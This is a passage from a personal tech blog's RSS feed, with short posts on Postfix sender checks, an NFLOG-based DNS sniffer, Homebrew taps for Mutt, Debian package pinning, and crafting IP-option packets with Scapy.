  3365.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324261</guid>
  3366.    <dc:creator>Andreas Jaggi</dc:creator>
  3367.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3368.    <pubDate>Sat, 14 Apr 2018 07:16:00 +0000</pubDate>
  3369.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3370.    <description><![CDATA[<p>Added another interesting blog to the Links: <a href="https://blog.benjojo.co.uk/" title="Benjojo's Blog">benjojo.co.uk</a></p>
  3371.  
  3372. <p>Ben builds and writes about a lot of funny small projects:</p>
  3373. <ul>
  3374. <li><a href="https://blog.benjojo.co.uk/post/dns-filesystem-true-cloud-storage-dnsfs" title="DNSFS. Store your files in others DNS resolver caches">Storing files in DNS caches</a></li>
  3375. <li><a href="https://blog.benjojo.co.uk/post/encoding-data-into-dubstep-drops" title="Encoding data in dubstep drops">Encoding data in dubstep music</a></li>
  3376. <li><a href="https://blog.benjojo.co.uk/post/tor-onions-to-v6-with-iptables-proxy" title="Giving every Tor Hidden Service a IPv6 address">Building an IPv6-to-Tor gateway</a></li>
  3377. <li><a href="https://blog.benjojo.co.uk/post/ssh-port-fluxing-with-totp" title="TOTP SSH port fluxing">Switching SSH port based on a time-based token</a></li>
  3378. </ul>
  3379. ]]></description>
  3380.    <content:encoded><![CDATA[<p>Added another interesting blog to the Links: <a href="https://blog.benjojo.co.uk/" title="Benjojo's Blog">benjojo.co.uk</a></p>
  3381.  
  3382. <p>Ben builds and writes about a lot of funny small projects:</p>
  3383. <ul>
  3384. <li><a href="https://blog.benjojo.co.uk/post/dns-filesystem-true-cloud-storage-dnsfs" title="DNSFS. Store your files in others DNS resolver caches">Storing files in DNS caches</a></li>
  3385. <li><a href="https://blog.benjojo.co.uk/post/encoding-data-into-dubstep-drops" title="Encoding data in dubstep drops">Encoding data in dubstep music</a></li>
  3386. <li><a href="https://blog.benjojo.co.uk/post/tor-onions-to-v6-with-iptables-proxy" title="Giving every Tor Hidden Service a IPv6 address">Building an IPv6-to-Tor gateway</a></li>
  3387. <li><a href="https://blog.benjojo.co.uk/post/ssh-port-fluxing-with-totp" title="TOTP SSH port fluxing">Switching SSH port based on a time-based token</a></li>
  3388. </ul>
  3389. ]]></content:encoded>
  3390.  </item>
  3391.  
  3392.  <item>
  3393.    <title>Exclude domain from unknown sender check</title>
  3394.    <link>https://blog.x-way.org/Linux/2018/04/04/Exclude-domain-from-unknown-sender-check.html</link>
  3395.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324260</guid>
  3396.    <dc:creator>Andreas Jaggi</dc:creator>
  3397.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3398.    <pubDate>Wed, 04 Apr 2018 23:03:00 +0000</pubDate>
  3399.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3400.    <description><![CDATA[<p><a href="http://www.postfix.org/" title="The Postfix Home Page">Postfix</a> provides the <a href="http://www.postfix.org/postconf.5.html#reject_unknown_sender_domain" title="Postfix Configuration Parameters: reject_unknown_sender_domain">reject_unknown_sender_domain</a> check which allows to only accept incoming e-mails sent from domains which actually exist.</p>
  3401. <p>Unfortunately there exists this one external service which uses a non-existing subdomain to send their notification e-mails. Thus all their notifications get rejected.</p>
  3402. <p>The following configuration allows to keep the reject_unknown_sender_domain check in place, but to exclude a specific domain from this check.</p>
  3403.  
  3404. <pre>
  3405. # snippet in main.cf
  3406. smtpd_sender_restrictions = check_sender_access pcre:/etc/postfix/sender_domain_verification
  3407. </pre>
  3408.  
  3409. <pre>
  3410. # exclude regex in sender_domain_verification
  3411. !/@domain\.to\.exclude\.com$/ reject_unknown_sender_domain
  3412. </pre>
  3413.  
  3414. <p>Your distribution might ship Postfix support for pcre matches in a dedicated package which needs to be installed separately (in the case of Debian you need to install the postfix-pcre package).</p>
  3415. ]]></description>
  3416.    <content:encoded><![CDATA[<p><a href="http://www.postfix.org/" title="The Postfix Home Page">Postfix</a> provides the <a href="http://www.postfix.org/postconf.5.html#reject_unknown_sender_domain" title="Postfix Configuration Parameters: reject_unknown_sender_domain">reject_unknown_sender_domain</a> check which allows to only accept incoming e-mails sent from domains which actually exist.</p>
  3417. <p>Unfortunately there exists this one external service which uses a non-existing subdomain to send their notification e-mails. Thus all their notifications get rejected.</p>
  3418. <p>The following configuration allows to keep the reject_unknown_sender_domain check in place, but to exclude a specific domain from this check.</p>
  3419.  
  3420. <pre>
  3421. # snippet in main.cf
  3422. smtpd_sender_restrictions = check_sender_access pcre:/etc/postfix/sender_domain_verification
  3423. </pre>
  3424.  
  3425. <pre>
  3426. # exclude regex in sender_domain_verification
  3427. !/@domain\.to\.exclude\.com$/ reject_unknown_sender_domain
  3428. </pre>
  3429.  
  3430. <p>Your distribution might ship Postfix support for pcre matches in a dedicated package which needs to be installed separately (in the case of Debian you need to install the postfix-pcre package).</p>
  3431. ]]></content:encoded>
  3432.  </item>
  3433.  
  3434.  <item>
  3435.    <title>Blogroll update</title>
  3436.    <link>https://blog.x-way.org/Misc/2018/04/01/Blogroll-update.html</link>
  3437.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324259</guid>
  3438.    <dc:creator>Andreas Jaggi</dc:creator>
  3439.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3440.    <pubDate>Sun, 01 Apr 2018 21:52:00 +0000</pubDate>
  3441.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3442.    <description><![CDATA[<p>Added the following blogs to the Links:</p>
  3443. <ul>
  3444. <li><a href="https://henrikwarne.com/" title="Henrik Warne&#039;s blog | Thoughts on programming&#8230;">Thoughts on programming</a></li>
  3445. <li><a href="https://eklitzke.org/" title="Evan Klitzke">eklitzke.org</a></li>
  3446. <li><a href="https://rachelbythebay.com/w/" title="rachelbythebay : Writing">rachelbythebay.com</a></li>
  3447. </ul>
  3448. <p>Seems like the blog/RSS thing is getting traction again: <a href="https://www.wired.com/story/rss-readers-feedly-inoreader-old-reader/" title="After years of letting algorithms make up our minds for us, the time is right to go back to basics.">It's Time for an RSS Revival</a> (<a href="https://news.ycombinator.com/item?id=16721690" title="It&#x27;s time to head back to RSS? | Hacker News">via</a>)</p>
  3449. ]]></description>
  3450.    <content:encoded><![CDATA[<p>Added the following blogs to the Links:</p>
  3451. <ul>
  3452. <li><a href="https://henrikwarne.com/" title="Henrik Warne&#039;s blog | Thoughts on programming&#8230;">Thoughts on programming</a></li>
  3453. <li><a href="https://eklitzke.org/" title="Evan Klitzke">eklitzke.org</a></li>
  3454. <li><a href="https://rachelbythebay.com/w/" title="rachelbythebay : Writing">rachelbythebay.com</a></li>
  3455. </ul>
  3456. <p>Seems like the blog/RSS thing is getting traction again: <a href="https://www.wired.com/story/rss-readers-feedly-inoreader-old-reader/" title="After years of letting algorithms make up our minds for us, the time is right to go back to basics.">It's Time for an RSS Revival</a> (<a href="https://news.ycombinator.com/item?id=16721690" title="It&#x27;s time to head back to RSS? | Hacker News">via</a>)</p>
  3457. ]]></content:encoded>
  3458.  </item>
  3459.  
  3460.  <item>
  3461.    <title>nflog_sniff extended with C++ implementation</title>
  3462.    <link>https://blog.x-way.org/Networking/2015/12/05/nflog_sniff-extended-with-C---implementation.html</link>
  3463.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324258</guid>
  3464.    <dc:creator>Andreas Jaggi</dc:creator>
  3465.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3466.    <pubDate>Sat, 05 Dec 2015 11:58:00 +0000</pubDate>
  3467.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3468.    <description><![CDATA[<p>With nflog_sniffer.cpp I've just added a C++ implementation to the <a href="https://github.com/x-way/nflog_sniff" title="x-way/nflog_sniff">nflog_sniff</a> repository.</p>
  3469. <p>It uses the lean (and apparently also very fast) <a href="https://libtins.github.io/" title="C++ packet sniffing and crafting library - libtins">libtins</a> library.</p>
  3470. ]]></description>
  3471.    <content:encoded><![CDATA[<p>With nflog_sniffer.cpp I've just added a C++ implementation to the <a href="https://github.com/x-way/nflog_sniff" title="x-way/nflog_sniff">nflog_sniff</a> repository.</p>
  3472. <p>It uses the lean (and apparently also very fast) <a href="https://libtins.github.io/" title="C++ packet sniffing and crafting library - libtins">libtins</a> library.</p>
  3473. ]]></content:encoded>
  3474.  </item>
  3475.  
  3476.  <item>
  3477.    <title>DNS packet sniffing with NFLOG and Perl/Python</title>
  3478.    <link>https://blog.x-way.org/Networking/2015/12/04/DNS-packet-sniffing-with-NFLOG-and-Perl-Python.html</link>
  3479.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324257</guid>
  3480.    <dc:creator>Andreas Jaggi</dc:creator>
  3481.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3482.    <pubDate>Fri, 04 Dec 2015 20:10:00 +0000</pubDate>
  3483.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3484.    <description><![CDATA[<p>The <a href="https://github.com/chifflier/nflog-bindings" title="chifflier/nflog-bindings">nflog-bindings</a> from Pierre Chifflier make it trivially easy to write a passive packet sniffer which can be controlled via iptables and listens to traffic on multiple interfaces at the same time.</p>
  3485. <p>As a little exercise I have written a simple DNS packet sniffer, once in Perl and once in Python:</p>
  3486. <script src="https://gist.github.com/x-way/caf03da77fe2cc83b6bd.js"></script>
  3487. <script src="https://gist.github.com/x-way/54955b8bb4bb28a77d06.js"></script>
  3488. <p>To use the sniffer, first create an iptables rule like this: iptables -I INPUT -p udp --sport 53 -j NFLOG --nflog-group 123</p>
  3489. <p>Then start one of the sniffer scripts and observe the extracted DNS queries :-)</p>
  3490. <p>For a more convenient download I've also put the scripts in a proper Github repository: <a href="https://github.com/x-way/nflog_sniff" title="x-way/nflog_sniff">nflog_sniff</a></p>
  3491. ]]></description>
  3492.    <content:encoded><![CDATA[<p>The <a href="https://github.com/chifflier/nflog-bindings" title="chifflier/nflog-bindings">nflog-bindings</a> from Pierre Chifflier make it trivially easy to write a passive packet sniffer which can be controlled via iptables and listens to traffic on multiple interfaces at the same time.</p>
  3493. <p>As a little exercise I have written a simple DNS packet sniffer, once in Perl and once in Python:</p>
  3494. <script src="https://gist.github.com/x-way/caf03da77fe2cc83b6bd.js"></script>
  3495. <script src="https://gist.github.com/x-way/54955b8bb4bb28a77d06.js"></script>
  3496. <p>To use the sniffer, first create an iptables rule like this: iptables -I INPUT -p udp --sport 53 -j NFLOG --nflog-group 123</p>
  3497. <p>Then start one of the sniffer scripts and observe the extracted DNS queries :-)</p>
  3498. <p>For a more convenient download I've also put the scripts in a proper Github repository: <a href="https://github.com/x-way/nflog_sniff" title="x-way/nflog_sniff">nflog_sniff</a></p>
  3499. ]]></content:encoded>
  3500.  </item>
  3501.  
  3502.  <item>
  3503.    <title>Mutt Homebrew Formula extended with indexcolor patch</title>
  3504.    <link>https://blog.x-way.org/Linux/2015/11/03/Mutt-Homebrew-Formula-extended-with-indexcolor-patch.html</link>
  3505.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324256</guid>
  3506.    <dc:creator>Andreas Jaggi</dc:creator>
  3507.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3508.    <pubDate>Tue, 03 Nov 2015 20:18:00 +0000</pubDate>
  3509.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3510.    <description><![CDATA[<p>I've just added the <a href="https://greek0.net/blog/2006/08/01/mutt-indexcolor-patch/" title="A mutt patch for a more colorful index">indexcolor</a> patch to my <a href="https://github.com/x-way/homebrew-mutt" title="x-way/homebrew-mutt">Mutt 1.5.24 Homebrew Formula</a>.</p>
  3511. <p>To use this Formula just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch --with-indexcolor-patch</kbd> to install Mutt 1.5.24 with trash_folder and indexcolor support.</p>
  3512. ]]></description>
  3513.    <content:encoded><![CDATA[<p>I've just added the <a href="https://greek0.net/blog/2006/08/01/mutt-indexcolor-patch/" title="A mutt patch for a more colorful index">indexcolor</a> patch to my <a href="https://github.com/x-way/homebrew-mutt" title="x-way/homebrew-mutt">Mutt 1.5.24 Homebrew Formula</a>.</p>
  3514. <p>To use this Formula just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch --with-indexcolor-patch</kbd> to install Mutt 1.5.24 with trash_folder and indexcolor support.</p>
  3515. ]]></content:encoded>
  3516.  </item>
  3517.  
  3518.  <item>
  3519.    <title>Homebrew Tap for Mutt 1.5.24 with trash_folder patch</title>
  3520.    <link>https://blog.x-way.org/Linux/2015/09/23/Homebrew-Tap-for-Mutt-1-5-24-with-trash_folder-patch.html</link>
  3521.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324255</guid>
  3522.    <dc:creator>Andreas Jaggi</dc:creator>
  3523.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3524.    <pubDate>Wed, 23 Sep 2015 22:31:00 +0000</pubDate>
  3525.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3526.    <description><![CDATA[<p>At work I'm a quite avid user of <a href="http://www.mutt.org/" title="The Mutt E-Mail Client">Mutt</a>. Unfortunately the upgrade to the recently released version 1.5.24 did not go over as smooth as expected.</p>
  3527. <p>I'm using <a href="http://brew.sh/" title="Homebrew - The missing package manager for OS X">Homebrew</a> to install Mutt on Mac OS X, and even though there is an updated version in the official Homebrew repository, it no longer comes with the trash_folder patch (it fails to apply against the 1.5.24 source tree and was thus removed).</p>
  3528. <p>In order to build the new Mutt version with the trash_folder support, I updated the patch for version 1.5.24: <a href="https://blog.x-way.org/stuff/mutt-1.5.24-trash_folder.diff" title="mutt-1.5.24-trash_folder.diff">mutt-1.5.24-trash_folder.diff</a>.</p>
  3529. <p>The official Homebrew repository prefers unpatched packages and encourages the creation of independent "Taps" (package repositories) for patched packages. Thus I also created my own Homebrew Tap which contains the 1.5.24 version of Mutt with the updated trash_folder patch: <a href="https://github.com/x-way/homebrew-mutt" title="x-way/homebrew-mutt">x-way/homebrew-mutt</a>.</p>
  3530. <p>To use this Tap just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch</kbd> to install Mutt 1.5.24 with trash_folder support. Cheers!</p>
  3531. ]]></description>
  3532.    <content:encoded><![CDATA[<p>At work I'm a quite avid user of <a href="http://www.mutt.org/" title="The Mutt E-Mail Client">Mutt</a>. Unfortunately the upgrade to the recently released version 1.5.24 did not go over as smooth as expected.</p>
  3533. <p>I'm using <a href="http://brew.sh/" title="Homebrew - The missing package manager for OS X">Homebrew</a> to install Mutt on Mac OS X, and even though there is an updated version in the official Homebrew repository, it no longer comes with the trash_folder patch (it fails to apply against the 1.5.24 source tree and was thus removed).</p>
  3534. <p>In order to build the new Mutt version with the trash_folder support, I updated the patch for version 1.5.24: <a href="https://blog.x-way.org/stuff/mutt-1.5.24-trash_folder.diff" title="mutt-1.5.24-trash_folder.diff">mutt-1.5.24-trash_folder.diff</a>.</p>
  3535. <p>The official Homebrew repository prefers unpatched packages and encourages the creation of independent "Taps" (package repositories) for patched packages. Thus I also created my own Homebrew Tap which contains the 1.5.24 version of Mutt with the updated trash_folder patch: <a href="https://github.com/x-way/homebrew-mutt" title="x-way/homebrew-mutt">x-way/homebrew-mutt</a>.</p>
  3536. <p>To use this Tap just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch</kbd> to install Mutt 1.5.24 with trash_folder support. Cheers!</p>
  3537. ]]></content:encoded>
  3538.  </item>
  3539.  
  3540.  <item>
  3541.    <title>Puppet Infrastructure 2015</title>
  3542.    <link>https://blog.x-way.org/Linux/2015/08/15/Puppet-Infrastructure-2015.html</link>
  3543.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324254</guid>
  3544.    <dc:creator>Andreas Jaggi</dc:creator>
  3545.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3546.    <pubDate>Sat, 15 Aug 2015 06:47:00 +0000</pubDate>
  3547.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3548.    <description><![CDATA[<p><a href="http://terrarum.net/blog/puppet-infrastructure-2015.html" title="Puppet Infrastructure 2015">Puppet Infrastructure 2015</a></p>
  3549. ]]></description>
  3550.    <content:encoded><![CDATA[<p><a href="http://terrarum.net/blog/puppet-infrastructure-2015.html" title="Puppet Infrastructure 2015">Puppet Infrastructure 2015</a></p>
  3551. ]]></content:encoded>
  3552.  </item>
  3553.  
  3554.  <item>
  3555.    <title>Downgrade Quagga on Debian 8</title>
  3556.    <link>https://blog.x-way.org/Linux/2015/08/12/Downgrade-Quagga-on-Debian-8.html</link>
  3557.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324253</guid>
  3558.    <dc:creator>Andreas Jaggi</dc:creator>
  3559.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3560.    <pubDate>Wed, 12 Aug 2015 04:11:00 +0000</pubDate>
  3561.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3562.    <description><![CDATA[<p>The <a href="http://www.nongnu.org/quagga/" title="Quagga Routing Suite">Quagga</a> version in Debian 8 (v0.99.23.1) suffers from a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=784292" title="quagga: ospf6d no loner updates route after upgrade to Jessie">bug in ospf6d</a>, which causes that no IPv6 routes are exchanged via point-to-point interfaces.</p>
  3563.  
  3564. <p>In order to workaround this problem (and re-establish IPv6 connectivity), a downgrade of the quagga package can be done.<br>
  3565. For this we add the 'oldstable' entry to sources.list and pin the quagga package to the old version.</p>
  3566.  
  3567. <p>Entry to add to /etc/apt/sources.list:</p>
  3568. <pre>deb http://mirror.switch.ch/ftp/mirror/debian/ oldstable main</pre>
  3569. <p>Entry to add to /etc/apt/preferences:</p>
  3570. <pre>Package: quagga
  3571. Pin: version 0.99.22.*
  3572. Pin-Priority: 1001</pre>
  3573.  
  3574. <p>After the entries have been added, run <kbd>apt-get update</kbd> followed by <kbd>apt-get install quagga</kbd> to downgrade to the old quagga package.</p>
  3575. ]]></description>
  3576.    <content:encoded><![CDATA[<p>The <a href="http://www.nongnu.org/quagga/" title="Quagga Routing Suite">Quagga</a> version in Debian 8 (v0.99.23.1) suffers from a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=784292" title="quagga: ospf6d no loner updates route after upgrade to Jessie">bug in ospf6d</a>, which causes that no IPv6 routes are exchanged via point-to-point interfaces.</p>
  3577.  
  3578. <p>In order to workaround this problem (and re-establish IPv6 connectivity), a downgrade of the quagga package can be done.<br>
  3579. For this we add the 'oldstable' entry to sources.list and pin the quagga package to the old version.</p>
  3580.  
  3581. <p>Entry to add to /etc/apt/sources.list:</p>
  3582. <pre>deb http://mirror.switch.ch/ftp/mirror/debian/ oldstable main</pre>
  3583. <p>Entry to add to /etc/apt/preferences:</p>
  3584. <pre>Package: quagga
  3585. Pin: version 0.99.22.*
  3586. Pin-Priority: 1001</pre>
  3587.  
  3588. <p>After the entries have been added, run <kbd>apt-get update</kbd> followed by <kbd>apt-get install quagga</kbd> to downgrade to the old quagga package.</p>
  3589. ]]></content:encoded>
  3590.  </item>
  3591.  
  3592.  <item>
  3593.    <title>fsociety00.dat</title>
  3594.    <link>https://blog.x-way.org/Misc/2015/07/19/fsociety00-dat.html</link>
  3595.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324252</guid>
  3596.    <dc:creator>Andreas Jaggi</dc:creator>
  3597.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3598.    <pubDate>Sun, 19 Jul 2015 23:44:00 +0000</pubDate>
  3599.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3600.    <description><![CDATA[<p><a href="https://blog.x-way.org/fsociety00.dat" title="fsociety00.dat">fsociety00.dat</a></p>
  3601. ]]></description>
  3602.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/fsociety00.dat" title="fsociety00.dat">fsociety00.dat</a></p>
  3603. ]]></content:encoded>
  3604.  </item>
  3605.  
  3606.  <item>
  3607.    <title>Scapy and IP Options</title>
  3608.    <link>https://blog.x-way.org/Networking/2015/07/12/Scapy-and-IP-Options.html</link>
  3609.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324251</guid>
  3610.    <dc:creator>Andreas Jaggi</dc:creator>
  3611.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3612.    <pubDate>Sun, 12 Jul 2015 23:56:00 +0000</pubDate>
  3613.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3614.    <description><![CDATA[<p>Create packets with custom IPv4 IP Option fields using <a href="http://www.secdev.org/projects/scapy/" title="Scapy is a powerful interactive packet manipulation program">Scapy</a>:</p>
  3615. <pre>
  3616. &gt;&gt;&gt; packet=IP(src="203.0.113.1",dst="203.0.113.2",options=[IPOption('%s%s'%('\x86\x28','a'*38))])
  3617. &gt;&gt;&gt; ls(packet)
  3618. version    : BitField             = 4               (4)
  3619. ihl        : BitField             = None            (None)
  3620. tos        : XByteField           = 0               (0)
  3621. len        : ShortField           = None            (None)
  3622. id         : ShortField           = 1               (1)
  3623. flags      : FlagsField           = 0               (0)
  3624. frag       : BitField             = 0               (0)
  3625. ttl        : ByteField            = 64              (64)
  3626. proto      : ByteEnumField        = 0               (0)
  3627. chksum     : XShortField          = None            (None)
  3628. src        : Emph                 = '203.0.113.1'   (None)
  3629. dst        : Emph                 = '203.0.113.2'   ('127.0.0.1')
  3630. options    : PacketListField      = [&lt;IPOption  copy_flag=1L optclass=control option=commercial_security length=40 value='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |&gt;] ([])
  3631. &gt;&gt;&gt; sr1(packet)
  3632. </pre>
  3633. <p>The above code results in the following packet (as seen by <a href="https://www.wireshark.org/" title="Wireshark Network Protocol Analyzer">Wireshark</a>):</p>
  3634. <p><img src="https://blog.x-way.org/images/scapy_ip_option.png" alt="Wireshark showing the packet with the custom IP Option" width="540" height="576"></p>
  3635. ]]></description>
  3636.    <content:encoded><![CDATA[<p>Create packets with custom IPv4 IP Option fields using <a href="http://www.secdev.org/projects/scapy/" title="Scapy is a powerful interactive packet manipulation program">Scapy</a>:</p>
  3637. <pre>
  3638. &gt;&gt;&gt; packet=IP(src="203.0.113.1",dst="203.0.113.2",options=[IPOption('%s%s'%('\x86\x28','a'*38))])
  3639. &gt;&gt;&gt; ls(packet)
  3640. version    : BitField             = 4               (4)
  3641. ihl        : BitField             = None            (None)
  3642. tos        : XByteField           = 0               (0)
  3643. len        : ShortField           = None            (None)
  3644. id         : ShortField           = 1               (1)
  3645. flags      : FlagsField           = 0               (0)
  3646. frag       : BitField             = 0               (0)
  3647. ttl        : ByteField            = 64              (64)
  3648. proto      : ByteEnumField        = 0               (0)
  3649. chksum     : XShortField          = None            (None)
  3650. src        : Emph                 = '203.0.113.1'   (None)
  3651. dst        : Emph                 = '203.0.113.2'   ('127.0.0.1')
  3652. options    : PacketListField      = [&lt;IPOption  copy_flag=1L optclass=control option=commercial_security length=40 value='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |&gt;] ([])
  3653. &gt;&gt;&gt; sr1(packet)
  3654. </pre>
  3655. <p>The above code results in the following packet (as seen by <a href="https://www.wireshark.org/" title="Wireshark Network Protocol Analyzer">Wireshark</a>):</p>
  3656. <p><img src="https://blog.x-way.org/images/scapy_ip_option.png" alt="Wireshark showing the packet with the custom IP Option" width="540" height="576"></p>
  3657. ]]></content:encoded>
  3658.  </item>
  3659.  
  3660.  <item>
  3661.    <title>Upgrade to Debian 8 without systemd</title>
  3662.    <link>https://blog.x-way.org/Linux/2015/07/11/Upgrade-to-Debian-8-without-systemd.html</link>
  3663.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324250</guid>
  3664.    <dc:creator>Andreas Jaggi</dc:creator>
  3665.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3666.    <pubDate>Sat, 11 Jul 2015 11:27:00 +0000</pubDate>
  3667.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3668.    <description><![CDATA[<p>To avoid the automatic installation/switch to systemd during the upgrade to Debian 8, it is enough to prevent the installation of the <code>systemd-sysv</code> package.</p>
  3669. <p>This can be done by creating a file <code>/etc/apt/preferences.d/no-systemd-sysv</code> with the following content:</p>
  3670. <pre>Package: systemd-sysv
  3671. Pin: release o=Debian
  3672. Pin-Priority: -1</pre>
  3673. <p>(<a href="http://noone.org/talks/debian-ohne-systemd/debian-ohne-systemd-cosin.html#(12)" title="Debian 8 Jessie ohne Systemd betreiben">via</a>)</p>
  3674. ]]></description>
  3675.    <content:encoded><![CDATA[<p>To avoid the automatic installation/switch to systemd during the upgrade to Debian 8, it is enough to prevent the installation of the <code>systemd-sysv</code> package.</p>
  3676. <p>This can be done by creating a file <code>/etc/apt/preferences.d/no-systemd-sysv</code> with the following content:</p>
  3677. <pre>Package: systemd-sysv
  3678. Pin: release o=Debian
  3679. Pin-Priority: -1</pre>
  3680. <p>(<a href="http://noone.org/talks/debian-ohne-systemd/debian-ohne-systemd-cosin.html#(12)" title="Debian 8 Jessie ohne Systemd betreiben">via</a>)</p>
  3681. ]]></content:encoded>
  3682.  </item>
  3683.  
  3684.  <item>
  3685.    <title>Obey the cloud!</title>
  3686.    <link>https://blog.x-way.org/Misc/2015/07/05/Obey-the-cloud.html</link>
  3687.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324249</guid>
  3688.    <dc:creator>Andreas Jaggi</dc:creator>
  3689.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3690.    <pubDate>Sun, 05 Jul 2015 17:22:00 +0000</pubDate>
  3691.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3692.    <description><![CDATA[<p>So true...</p>
  3693. <p><img src="https://blog.x-way.org/images/adobe_cloud.jpg" alt="Johannes Kretzschmar - Obey the cloud!" width="450" height="2514"></p>
  3694. <p><a href="http://blog.beetlebum.de/2015/06/24/obey-the-cloud/" title="Obey the cloud!">"Obey the cloud!"</a> by <a href="http://blog.beetlebum.de" title="Jojos illustrierter Blog">Johannes Kretzschmar</a>, licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/" title="Creative Commons - Attribution-NonCommercial-ShareAlike 3.0 Unported - CC BY-NC-SA 3.0">CC BY-NC-SA 3.0</a>.</p>
  3695. ]]></description>
  3696.    <content:encoded><![CDATA[<p>So true...</p>
  3697. <p><img src="https://blog.x-way.org/images/adobe_cloud.jpg" alt="Johannes Kretzschmar - Obey the cloud!" width="450" height="2514"></p>
  3698. <p><a href="http://blog.beetlebum.de/2015/06/24/obey-the-cloud/" title="Obey the cloud!">"Obey the cloud!"</a> by <a href="http://blog.beetlebum.de" title="Jojos illustrierter Blog">Johannes Kretzschmar</a>, licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/" title="Creative Commons - Attribution-NonCommercial-ShareAlike 3.0 Unported - CC BY-NC-SA 3.0">CC BY-NC-SA 3.0</a>.</p>
  3699. ]]></content:encoded>
  3700.  </item>
  3701.  
  3702.  <item>
  3703.    <title>The Day Is My Enemy</title>
  3704.    <link>https://blog.x-way.org/Music/2015/02/25/The-Day-Is-My-Enemy.html</link>
  3705.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324248</guid>
  3706.    <dc:creator>Andreas Jaggi</dc:creator>
  3707.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3708.    <pubDate>Wed, 25 Feb 2015 03:08:00 +0000</pubDate>
  3709.    <category domain="https://blog.x-way.org/Music">Music</category>
  3710.    <description><![CDATA[<p><a href="https://youtu.be/h1AaKBbNGkk" title="The Prodigy - The Day Is My Enemy - YouTube">The Prodigy - The Day Is My Enemy</a></p>
  3711. <p>Looking forward to see the live performance at the <a href="https://web.archive.org/web/20150226015240/http://www.futuremusicfestival.com.au/" title="Future Music Festival 2015 (archive.org)">Future Music Festival 2015</a> :-)</p>
  3712. ]]></description>
  3713.    <content:encoded><![CDATA[<p><a href="https://youtu.be/h1AaKBbNGkk" title="The Prodigy - The Day Is My Enemy - YouTube">The Prodigy - The Day Is My Enemy</a></p>
  3714. <p>Looking forward to see the live performance at the <a href="https://web.archive.org/web/20150226015240/http://www.futuremusicfestival.com.au/" title="Future Music Festival 2015 (archive.org)">Future Music Festival 2015</a> :-)</p>
  3715. ]]></content:encoded>
  3716.  </item>
  3717.  
  3718.  <item>
  3719.    <title>Hand-crafted IP packets</title>
  3720.    <link>https://blog.x-way.org/Networking/2015/01/11/Hand-crafted-IP-packets.html</link>
  3721.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324247</guid>
  3722.    <dc:creator>Andreas Jaggi</dc:creator>
  3723.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3724.    <pubDate>Sun, 11 Jan 2015 23:16:00 +0000</pubDate>
  3725.    <category domain="https://blog.x-way.org/Networking">Networking</category>
